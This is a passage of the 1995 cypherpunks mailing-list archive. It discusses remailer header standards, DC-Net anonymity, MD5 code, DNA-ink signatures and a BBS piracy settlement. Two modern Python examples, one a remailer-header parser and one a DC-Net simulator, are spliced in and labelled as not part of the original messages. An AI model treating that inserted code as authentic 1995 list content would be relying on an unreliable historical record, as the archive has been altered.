To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <Pine.SUN.3.91.950206130709.20818A-100000@thrash.src.umd.edu>
Message-ID: <9502061830.AA04828@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> On Mon, 6 Feb 1995, Perry E. Metzger wrote:
> 
> > Remember, by the way, that PPP is far cheaper per customer than shell
> > accounts, even though moronic providers right now don't make it look
> > that way.
> 
> PPP/SLIP is currently not cheaper per customer - if you figure in the 
> time your help desk staff put in over the first couple of weeks of a new 
> customer coming on line.

That's because the providers never package things up cleanly. If they
sent a client on a disk, a la AOL, and they set things up to
autoconfigure, they'd never need to speak to the clients.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Mon, 6 Feb 95 07:45:16 PST
To: cypherpunks@toad.com
Subject: Camden New Jersey
Message-ID: <9502061348.AA14911@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



I thought nothing but armed robberies happened in Camden New Jersey.

Teenage Pirate To Pay $25,000, Loses BBS Equipment
CAMDEN, NEW JERSEY, U.S.A., 1995 FEB 3 (NB) -- A teenage computer operator
charged with illegally distributing hundreds of copyrighted commercial
software programs has reached a settlement with Novell Inc., (NASDAQ: NOVL)
and Microsoft Corp., (NASDAQ: MSFT).

The settlement requires the operator of the now-defunct Deadbeat Bulletin
Board to pay $25,000 to Novell and Microsoft and forfeit the equipment he
used to run the board to the two software makers.

The agreement apparently closes the book on an investigation of the New
Jersey computer BBS (bulletin board service), which authorities said
contained several hundred commercial software products. The equipment was
seized in an August raid of the board.

This was just one of the cases investigated under an aggressive joint
campaign by Novell and Microsoft to locate and prosecute pirate system
operators. The project was mounted last summer and has already resulted in
the closing of two bulletin boards. The two companies said they expect more
seizures in the near future.

Pirate bulletin boards let users download commercial products, paying for
them in money or in barter by uploading programs the BBS doesn't have.
According to Novell the Deadbeat Bulletin Board also contained several beta
files, software which is still in the testing stage. Beta programs are often
incomplete or contain problems, and are distributed to a limited number of
users so those problems can be worked out before the final product comes to
market.

Novell and Microsoft investigators said they first got wind of the illegal
software in late July, and eventually discovered more than 60 Novell and
Microsoft products on the board. A court ordered seizure of the equipment and
the raid was carried out in August. The court records have been sealed until
now.

The agreement also prohibits Microsoft and Novell from any further action
against the 17-year old boy and from releasing his name.

(Jim Mallory/19950203/Press contact: Jessica Jersey, Novell, 408-577-8739;
Public contact: 800-785-3448 or 800-747-2837 to report suspected software
piracy)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Mon, 6 Feb 95 14:09:54 PST
To: eric@remailer.net
Subject: Re: "encrypt tcp connections" hacks
Message-ID: <Chameleon.4.01.950206140937.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>It's certain that IP security will greatly increase the overall
>security of the Internet.  I'm not advocating its removal but rather
>the acknowledgement that higher (and lower) level abstractions will
>require their own cryptography.

This resolves to a layered quality-of-service issue.  Encryption and
authentication at the network layer provides an excellent base for
improving security, and in and of itself solves a lot of problems like
packet payload sniffing, session stealing, etc.

But as you so aptly point out, trust boundaries do not coincide with
network boundaries.  Applications that "ride" on top of TCP and UDP may
have their own, very different, threat models.  And sniffing the
physical layer provides most of what you need for traffic analysis
unless some sort of sophisticated packet laundering is used.

You pointed this out to me at the last cpunks meeting--each layer in the
network model needs to be able to ask for and use security facilities in
the lower layer, as well as advertise its security features to the next
layer up. 

Of course, it is perfectly reasonable for me to expect to write an
email, encrypt it with PGP and send it via an encrypted SMTP protocol to
my mail gateway.  On its way, it will ride on top of an encrypted TCP
session to port 25, with the physical T1 link between my site and the
internet encrypted as well.  This is an example of security features
present at most of the layers between 1 and 7 of the OSI model.  These
should remain independent.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                    http://ftp.netcom.com/pub/jc/jcorgan/home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzad6E1Diok8GKihAQExdAP+LZvM2rbJWf6WwIs2oHPjfWRCyXAQTnYm
gpMld86xiJeM5AKudlH2YW+b12lv+9wdH71Fo38FNOdLDX7xDkXQzmkz2creV7sQ
GCfrJOAObLro8vwpZ5LVwin0qvmZzH4PO7to2Th3iYGbrXh4zoOdr5GNLU8j+wTd
HcV9N6nELxg=
=iNH8
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: philip@cs.brandeis.edu (Philip Trauring)
Date: Mon, 6 Feb 95 10:59:56 PST
To: cypherpunks@toad.com
Subject: MD5 coding
Message-ID: <ab5c1c670202100461ba@[129.64.123.61]>
MIME-Version: 1.0
Content-Type: text/plain


I am looking to put together an MD5 message digest program and have
extracted the MD5.c and MD5.h files from PGP (excerpt of the MD5.h file
below) but I'm not sure how it all works. Can someone who is familiar with
the functions and the data structure please e-mail me with a bit of
guidance as to what each one does and how to implement it. If anyone can
lead me to a good description of the processes involved I would appreciate
that too. Thanks.

----====----
struct MD5Context {
        uint32 buf[4];
        uint32 bits[2];
        unsigned char in[64];
};

void MD5Init(struct MD5Context *context);
void MD5Update(struct MD5Context *context, unsigned char const *buf,
unsigned len);
void MD5Final(unsigned char digest[16], struct MD5Context *context);
void MD5Transform(uint32 buf[4], uint32 const in[16]);
----====----

        Philip Trauring

--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--
    Philip Trauring                     Brandeis University MB1001
    philip@cs.brandeis.edu              P.O. Box 9110
    (617) 736-5282 ['94/95]             Waltham, Ma  02254-9110
--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.sf.ca.us>
Date: Mon, 6 Feb 95 14:13:47 PST
To: cypherpunks@toad.com
Subject: RE: DNA ink
Message-ID: <199502062213.OAA11162@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain



>>Lucky Green says:
>> At 10:30 PM 2/5/95, Dan Harmon wrote:
>>I just saw an item on CNN about a company in LA called Art Guard. 
>>It sells an ink that is created using your dna as a protection
>>against forged signatures.
>> 
>> Why not just sign in blood?

>The same occurred to me.

>Perry

 Yes, this would work even better! If the ink just contained your
DNA, someone could use PCR to duplicate it! If you actually signed
in blood, they would have to match the type and if a white blood
cell was there they would have to "forge" the mitochondria since
they have different DNA! This is not to mention other blood
factors.

 There is prime material here for Klaus! on the difficulties of
running "blood remailers" "anonymous bloodletting," etc.....


Brian D Williams
Cypherpatriot


"Prime material here"  heh heh!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Sun, 5 Feb 95 19:18:28 PST
To: cypherpunks@toad.com
Subject: Re: Judge not...
In-Reply-To: <199502060147.RAA25515@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950206141712.8260C-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Feb 1995 anonymous-remailer@shell.portal.com wrote:

[ I wonder why he/she/it wishes to remain anonymous? ]

> Here's something I thought would probably be of interest to more than a
> few here that read Usenet news.  First article is the "Cancel FAQ" put out
> by the "Judges List", which many may have seen on the new.admin.*
> groups.  Following it is the "Judges List" FAQ.  

Thanks - I hardly read the news.* hierarchy these days.

> I doubt this is a major threat, but is a good example of the sort of
> thing that needs to be nipped in the bud.

Why?

> If the "Cancel FAQ" doesn't trip any alarms, be sure to read the
> following "Judges List" FAQ.  

I did - I don't have a problem with it.  Do you?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 6 Feb 95 11:43:50 PST
To: philip@cs.brandeis.edu (Philip Trauring)
Subject: Re: MD5 coding
In-Reply-To: <ab5c1c670202100461ba@[129.64.123.61]>
Message-ID: <199502061946.OAA00186@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I am looking to put together an MD5 message digest program and have
| extracted the MD5.c and MD5.h files from PGP(excerpt of the MD5.h file
| below) but I'm not sure how it all works. Can someone who is familiar with
| the functions and the data structure please e-mail me with a bit of
| guidance as to what each one does and how to implement it. If anyone can
| lead me to a good description of the processes involved I would appreciate
| that too. Thanks.

	I seem to recall that md5 is explained pretty well in
Schneier.  You may be doing this to learn, which is great, but you
might be pleased to know that there are several md5 programs already
available.  Tripwire includes one, and there was one included in a
CERT/CIAC advisory last year.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: philip@cs.brandeis.edu (Philip Trauring)
Date: Mon, 6 Feb 95 12:15:03 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: MD5 coding
Message-ID: <ab5c33b100021004dc51@[129.64.123.61]>
MIME-Version: 1.0
Content-Type: text/plain


>        I seem to recall that md5 is explained pretty well in
>Schneier.  You may be doing this to learn, which is great, but you
>might be pleased to know that there are several md5 programs already
>available.  Tripwire includes one, and there was one included in a
>CERT/CIAC advisory last year.
>
>
>Adam

I need a version that will run on a Mac also which is the version I am
putting together now. I know there are versions for DOS and other platforms
but I specifically need to be able to run it on a Mac since the server I am
producing is Mac-based.

        Philip Trauring


--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--
    Philip Trauring                     Brandeis University MB1001
    philip@cs.brandeis.edu              P.O. Box 9110
    (617) 736-5282 ['94/95]             Waltham, Ma  02254-9110
--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 12:44:12 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Cooperation
In-Reply-To: <199502062011.MAA19947@largo.remailer.net>
Message-ID: <9502062043.AA05429@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric says:
> If an RFC is issued, I personally would like to clean up the syntax
> and get the remailer operators to upgrade accordingly.
> 
> In particular, I chose Request-Remailing-To: as a purposefully obtuse
> experimental name.  It deserves to die.

I'd say that it would work far better if things were changed to MIME
formats. You would send a message by recursively encapsulating your
message to be remailed inside a MIME message. Simple and clean...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Katy Kislitzin <ktk@anemone.corp.sgi.com>
Date: Mon, 6 Feb 95 16:02:37 PST
To: rem-conf@es.net
Subject: preliminary cypherpunks announcement
Message-ID: <199502070002.QAA28857@anemone.corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


hi!  we're going to try again to broadcast this saturday's sf bay area
cypherpunks meeting.  Scheduled time is Feb 11, 1pm - 6pm.
Crypto-anarchy will be the order of the day, as usual; will post a
real announcement with speakers and topics shortly.  Please let me
know asap if there are conflicts...

--kt
Katy Kislitzin
Silicon Graphics
I/S Network Software
ktk@corp.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 13:31:30 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: dna ink
In-Reply-To: <v0151010eab5c172d0d6e@[192.0.2.1]>
Message-ID: <9502062129.AA05503@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green says:
> At 10:30 PM 2/5/95, Dan Harmon wrote:
> >I just saw an item on CNN about a company in LA called Art Guard.  It
> >sells an ink that is created using your dna as a protection against
> >forged signatures.
> 
> Why not just sign in blood?

The same occurred to me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 6 Feb 95 14:08:37 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Cooperation
Message-ID: <ab5c4d2f0902100430ee@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 PM 02/06/95, Perry E. Metzger wrote:
>I'd say that it would work far better if things were changed to MIME
>formats. You would send a message by recursively encapsulating your
>message to be remailed inside a MIME message. Simple and clean...

Well... perhaps for a future remailer standard.  I think the purpose of an
RFC at this point is to clearly outline how it is that present remailers
work, and standardize the working somewhat, and provide a document for
people writing new remailers to look at to make sure their remailers work
like everyone else's (or are a superset of the "Standard Type 1 Remailer"
functions, a superset which certainly could include MIME or anything else).
The point is to accurately describe how most remailers work now, rather
than propose a major change in the way most remailers work.  The latter has
a place, but the former seems more pressing, as well as easier to do, and
perhaps a first step to the latter.

Changing "Request-Remailing-To:" to "Anon-Send-To:" is trivial, in that it
would be an incredibly minor code change, and in that some remailers
already implement "Anon-Send-To:".  But changing everything to MIME would
not be so trivial, and if we published a "standard" that said to do it with
MIME, we'd end up with a standard that in fact no one follows, that doesn't
accurately describe the way things are.  The remailers are definitely
evolving,  and it's been mentioned that it might be a good idea to have a
Type 1 Remailer standards document, and a Type 2 Remailer standards
document, etc.  But it seems of primary importance to first publish a
standard of how the remailers _are_ (Type 1 remailer), instead of how we
might wish they could be.   (Type 1 remailer with MIME, Type 2 remailer,
whatever).

As for the idea of using MIME headers in itself, I'm a bit concerned that
it might make it overly complicated to put together a to-be-remailed
message by hand.  I'm not entirely familiar with MIME and recursive
encapsulation of MIME, so my concern might be ungrounded.  But I think it
might be a Good Thing that it's easy to remail a message by hand by adding
a simple "::\nAnon-Send-To:" at the top, and it would be a mistake to make
it more complicated or difficult to do this by hand, unless it's really
necessary for some reason.
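
The by-hand format mentioned above, parsed in Python as an added example that
is not part of the original message and not any remailer's own code. Only the
"::" marker and the two header names come from the thread; ending the header
block at the first blank line, the single-mailbox check, the hop limit and all
function names and addresses are assumptions made for this sketch.

```python
import re

# Header names quoted in the thread; matched case-insensitively here.
DEST_HEADERS = ("request-remailing-to", "anon-send-to")
# Assumption: a destination is exactly one bare mailbox (no list, no display name),
# so a single request cannot fan out to several recipients.
MAILBOX = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$")


class RemailError(ValueError):
    """Raised when a '::' block is present but unusable."""


def parse_request(body):
    """Split a message body into (destination, payload).

    Returns (None, body) when the body does not open with a '::' block.
    """
    lines = body.split("\n")
    start = 0
    while start < len(lines) and not lines[start].strip():
        start += 1                                  # tolerate leading blank lines
    if start == len(lines) or lines[start].strip() != "::":
        return None, body

    dest = None
    i = start + 1
    while i < len(lines) and lines[i].strip():      # header block ends at a blank line
        name, sep, value = lines[i].partition(":")
        if not sep:
            raise RemailError("malformed header line: %r" % lines[i])
        if name.strip().lower() in DEST_HEADERS:
            if dest is not None:
                raise RemailError("more than one destination header")
            dest = value.strip()
        i += 1

    if dest is None:
        raise RemailError("'::' block without a destination header")
    if not MAILBOX.match(dest):
        raise RemailError("destination is not a single mailbox: %r" % dest)
    return dest, "\n".join(lines[i + 1:])


def route(body, max_hops=10):
    """Peel nested requests as successive remailers would; return (hops, payload)."""
    hops = []
    while True:
        dest, rest = parse_request(body)
        if dest is None:
            return hops, body
        hops.append(dest)
        if len(hops) > max_hops:
            raise RemailError("too many nested requests")
        body = rest


# Constructed sample: a two-hop request typed by hand.
CHAINED = (
    "::\n"
    "Request-Remailing-To: hop2@remailer.example\n"
    "\n"
    "::\n"
    "Anon-Send-To: alice@example.org\n"
    "\n"
    "Hello Alice.\n"
)

if __name__ == "__main__":
    print(route(CHAINED))
```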






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 6 Feb 95 17:23:00 PST
To: cypherpunks@toad.com
Subject: a simple explanation of DC-Net
Message-ID: <199502070122.AA01568@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The DC-Net is not very easy to understand.  I'll try to explain the most
important parts of the concept as simply as I can.

Let's say there are a number of participants in a DC-Net.  Each
participant shares a different one-time pad with each of several other
participants.

At most one participant can send one bit through the DC-Net per "round".
How does this work?  For each round i, a participant takes the i-th bit
of all the one-time pads that he has and XORs them together.  If he
doesn't want to send a bit, he just broadcasts the resulting bit to
every other participant.  If he DOES want to send a bit, then he
broadcasts the XOR of that resulting bit and the bit he wants to send.
When everyone has done this, each participant takes all of the bits that
have been broadcast, and XORs them together.  This last action produces
the output of the DC-Net for the i-th round.

Suppose for the first round nobody wants to send a bit.  Since each one-
time pad is known by 2 participants, the first bit of each pad has been
XORed into the final output twice.  Since anything XORed by anything
twice equals itself, these two XORs cancel each other out.  And since
nothing else has been XORed into the output, the output must equal 0.

If one participant wanted to send a bit, however, then something else
HAS been XORed into the output.  Since all the bits from the one-time
pads cancel out, the output equals the bit he wanted to send.

Wei Dai

P.S.  I realize someone has probably written something like this
already, but I hope this explanation helps someone who is still
puzzled.  If nothing else, it serves as a sanity check on my own
understanding.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzbKfTl0sXKgdnV5AQGTpwQAtGe5zl91MgA/ayzBGo/DLXh7NyTDSw00
h/qZZxh2U9HoNFLHMMiHV64PYE8poJlCH8kLDY+XZlv1phoiBtMnc2AehN5XVJmr
YCQ77rH9vp6yk6SZ5F7HV/UNIIQj6TkW806OZP7LlgUrXWPZdCSYGPh7n60J4TkD
RaspzTgFcUk=
=ml6y
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?
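
The rounds described above, simulated in Python as an added example that is
not part of the original message; the participant names, the pad graph and all
function names are constructed for illustration. It also covers the case the
message rules out, two senders in one round, whose bits are XORed together.

```python
import secrets
from functools import reduce
from operator import xor

# Constructed example: four participants, each sharing pads with several others.
PARTICIPANTS = ["A", "B", "C", "D"]
PAD_PAIRS = [("A", "B"), ("B", "C"), ("C", "D"), ("D", "A"), ("A", "C")]


def make_pads(participants, pairs, rounds):
    """One shared one-time pad (a list of random bits) per pair of participants."""
    pads = {frozenset(p): [secrets.randbits(1) for _ in range(rounds)] for p in pairs}
    for who in participants:
        if not any(who in pair for pair in pads):
            # With no pad, this participant's announcement would be the bare bit.
            raise ValueError("participant %s shares no pad" % who)
    return pads


def announce(who, pads, i, message_bit=None):
    """The bit `who` broadcasts in round i: XOR of the i-th bit of every pad
    they hold, XORed with their message bit if they are sending."""
    bit = 0
    for pair, pad in pads.items():
        if who in pair:
            bit ^= pad[i]
    if message_bit is not None:
        bit ^= message_bit
    return bit


def run_round(participants, pads, i, senders):
    """Run round i. `senders` maps participant -> bit to send (empty = idle round).
    Returns (all announcements, DC-Net output for the round)."""
    said = {p: announce(p, pads, i, senders.get(p)) for p in participants}
    return said, reduce(xor, said.values(), 0)


def to_bits(data):
    return [(byte >> (7 - k)) & 1 for byte in data for k in range(8)]


def from_bits(bits):
    return bytes(
        reduce(lambda acc, b: (acc << 1) | b, bits[i:i + 8], 0)
        for i in range(0, len(bits), 8)
    )


def transmit(participants, pairs, sender, message):
    """Send `message` (bytes) one bit per round over fresh pads; return what
    every participant reconstructs from the broadcasts."""
    bits = to_bits(message)
    pads = make_pads(participants, pairs, len(bits))
    received = [run_round(participants, pads, i, {sender: b})[1]
                for i, b in enumerate(bits)]
    return from_bits(received)


if __name__ == "__main__":
    pads = make_pads(PARTICIPANTS, PAD_PAIRS, 3)
    print("idle round     ->", run_round(PARTICIPANTS, pads, 0, {})[1])
    print("C sends 1      ->", run_round(PARTICIPANTS, pads, 1, {"C": 1})[1])
    print("A and D send 1 ->", run_round(PARTICIPANTS, pads, 2, {"A": 1, "D": 1})[1])
    print("B transmits    ->", transmit(PARTICIPANTS, PAD_PAIRS, "B", b"hi"))
```

Every pad bit appears in exactly two announcements, so the round output depends
only on the message bits, while each single announcement stays masked by pads
the observer does not hold.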




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 6 Feb 95 19:27:53 PST
To: perry@imsi.com
Subject: Re: dna ink
In-Reply-To: <9502062129.AA05503@snark.imsi.com>
Message-ID: <199502062339.RAA00978@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Lucky Green says:
> > At 10:30 PM 2/5/95, Dan Harmon wrote:
> > >I just saw an item on CNN about a company in LA called Art Guard.  It
> > >sells an ink that is created using your dna as a protection against
> > >forged signatures.
> > 
> > Why not just sign in blood?
> 
> The same occurred to me.
> 
> Perry
> 
The blood is water soluble and many of the components break down over time. By
injecting DNA (which has lifetimes measured in millions of years) in some kind
of matrix (ie epoxy or cyanoacetates) it becomes possible to create a modern
'seal' similar to the wax seals of yesteryear. In the case of the old seals it
was not the wax which provided the protection but rather the symbology that was
embedded in it (ie DNA).

And you thought that T Rex forward from the dinosaur mailing list about DNA
from dinosaur bones was unrelated to crypto......bwahahahahaha


                                                      Ravage
                                                       Black
                                                        Leather
                                                         Monster

ps You really should go take a look at the mathematics used to 'bridge' gaps
   in the DNA strands.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Mon, 6 Feb 95 19:13:47 PST
To: Name Withheld By Request <cs000rrs@selway.umt.edu>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.ULT.3.91.950130063546.13138C-100000@selway.umt.edu>
Message-ID: <Pine.A32.3.91c.950206190403.47399A-100000@mead2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Name Withheld By Request wrote:

> Does this stupid OS flamewar have *anything* to do with cypher? No.
> 
> Could it *PLEASE* be taken somewhere else?

Yea, like the UNIX-HATERS mailing list, or the appropriate 
comp.*.advocacy group.

I read this list to hear about *cypherpunks*, and while it is true that a 
good cypherpunk will write code, he/she should do so under the OS of 
his/her choice and not engage in OS holy wars.  There need to be good 
cypherpunk tools for *ALL* operating systems/environments, flaming people 
over their operating system is not a good way to accomplish this.

-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Mon, 6 Feb 95 19:58:14 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502061830.AA04828@snark.imsi.com>
Message-ID: <Pine.SV4.3.91.950206191208.28669C-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> That's because the providers never package things up cleanly. If they
> sent a client on a disk, a la AOL, and they set things up to
> autoconfigure, they'd never need to speak to the clients.

    You've obviously never attempted to get a Windows product working for 
someone whose previous experience with a computer is limited to "Solitaire".

    I've done work with this ISP, and I can tell you it's nearly the most 
frustrating experience I've had in my life -- Windows has bizarre 
conflicts with software eating other software, ports getting set up 
wrong, and just general nastiness.  Even the slickest software needs 
helpline time - for whatever reason.

-jo

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 6 Feb 95 19:28:34 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: (dis)advantages of DC-Net vs remailers
Message-ID: <199502070328.AA11135@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@netcom.com wrote:

> Chaumian digital mixes--what you Americans call "remailers"--mainly
> solves the sender anonymity problem. Message pools, or broadcast to a
> group or site that includes the receiver, mainly deals with receiver
> anonymity. The combination of the two deals with both.
> 
> Both are solved elegantly with the Dining Cryptographer's Protocol,
> about which much is written on this list every few months. Messages
> are "sent" in an Ouija-board fashion and received by the person who
> can successfully decrypt a public message sent over the system.

I tend to favor remailers + broadcasting + anonymous-return-addresses
over the DC-Net protocol.  Let me list some of their relative 
advantages and disadvantages.  Please add to these if you can think
of more...

Advantages of DC-Net over remailers

	- more flexible trust relationships - you can add your buddies to 
		the set of people who have to be compromised to trace you
	- lower latency - don't have to wait for remailers to collect enough 
		mail for batches
	- untraceability need not depend on assumptions about the enemy's
		computational power

Disadvantages of DC-Net

	- complexity - explaining the core concepts of a remailer takes only 
		a couple of lines, as opposed to a couple of screens for a DC-Net.
		Implementation of a DC-Net seems to be an order of magnitude
		harder as well.
	- more vulnerable to denial of service attacks
	- MUCH higher bandwidth costs

I think over the long run the last factor will be most important.  In 
a DC-Net, for each bit one participant wants to send to another, EVERY
OTHER participant must broadcast a bit to ALL participants.  I can 
imagine a remailer-net with one million users, but I don't see any 
possibility that a DC-Net can be scaled to that size.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzboXjl0sXKgdnV5AQEqqAP+JU2sgiESnFZm+CCgNNboXnL3uKg0GP4Z
y6NV+U56yGvPKzsi9suUiOpbuzwsYVaMnWIuqRCOaxic75SFsDi0NvjE1K4JgyXz
aoyVs1i+xlFKnfmZr1+7EAheUq7wlfSWdp0cnAhbNWSrC3cSuDiNGYciJQLW8GGv
3YUvmW+Xoj0=
=Aa+t
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Feb 95 20:18:10 PST
To: cypherpunks@toad.com
Subject: Re: New directions in anonymity (needed)
In-Reply-To: <199502060743.XAA01417@netcom14.netcom.com>
Message-ID: <199502070417.UAA18418@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: tcmay@netcom.com (Timothy C. May)
> Date: Sun, 5 Feb 1995 23:43:39 -0800 (PST)
> 
> Mike Ingle wrote:
> > All of our anonymous systems boil down to only two techniques: indirection
> > and broadcast. Indirection is sending a message through one or more
> > intermediate nodes to conceal its point of origin. Broadcast is sending a
> > message to multiple recipients to conceal the intended recipient.
> 
> First, I think it important to clearly distinguish between "sender
> anonymity," where the physical identity or sending site is hidden, and
> "receiver anonymity," where the same is true of the receiving site.

  I agree and will call them s anonymity, and r anonymity cause I am
too lazy to type much.

> Chaumian digital mixes--what you Americans call "remailers"--mainly
> solves the sender anonymity problem. Message pools, or broadcast to a
> group or site that includes the receiver, mainly deals with receiver
> anonymity. The combination of the two deals with both.

  I'll call the combo of "sender -> remail network -> pool ->
receiver" by the term "repool" in this message.

> Both are solved elegantly with the Dining Cryptographer's Protocol,
> about which much is written on this list every few months. Messages
> are "sent" in an Ouija-board fashion and received by the person who
> can successfully decrypt a public message sent over the system.

  Not so.  Though Chaum's DC protocol does give s/r anonymity, it does
so at a large cost.  Much larger than the repool protocol.

> > Broadcast is exactly as secure as it is nonscalable. If you
> > broadcast to 100 people, an attacker's uncertainty is one in
> > 100. The security grows linearly with the overall bandwidth. For
> > cryptographic-level security, it would need to grow exponentially
> > with bandwidth.

  I think this is exactly the right approach.  So, let's look at the
cost of attaining anonymity.  For U people to communicate M bits (total
-- 2 people each sending 2 bits is M==4) s/r anonymously takes O(U*M)
bits multicast bandwidth for Chaum's DC protocol, but the repool
protocol uses only O(h*M) bits narrowcast bandwidth plus O(M) bits
multicast bandwidth (Where h is the average number of remailer hops,
expected to be a constant wrt U and M, smaller than U, and much smaller
than M).

  Chaum's DC protocol also assumes an _interactive_ speed multicast
network.  Ouch!  The multicast internet protocol does help address
this problem, but it isn't widely available.  IRC is perhaps a bit
more expensive, more widely available, but lower bandwidth than
multicast IP packets.

> [...]
> > Anonymity needs something fundamentally new, something comparable to public
> > key for cryptography or blind signatures for digital cash. Suppose a server
> 
> I think you ought to carefully look at Chaum's work on Dining
> Cryptographers. It does all this. (It ain't perfect, and it ain't been
> implemented in practical terms, a la a "Pretty Good Dining
> Cryptographers," but it's at least as basic a concept as the other
> things are....some might say that all are variations on the same theme.)

  Chaum's DC protocol achieves U way s/r anonymity for U times the
work of sending a message.  Chaum's DC protocol provides s anonymity
as conditional as the cryptosystem achieves privacy (i.e.
unconditional for one time pads, and dependent on 'strong
cryptosystems' assumption for the 'conventional' DC net).  Like the
repool protocol, it provides unconditional r anonymity.

  The repool protocol achieves U way s/r anonymity for no more than h
times the work of sending a message.  The repool protocol (by use of a
pool) provides unconditional (U-way) r anonymity, but (due to using
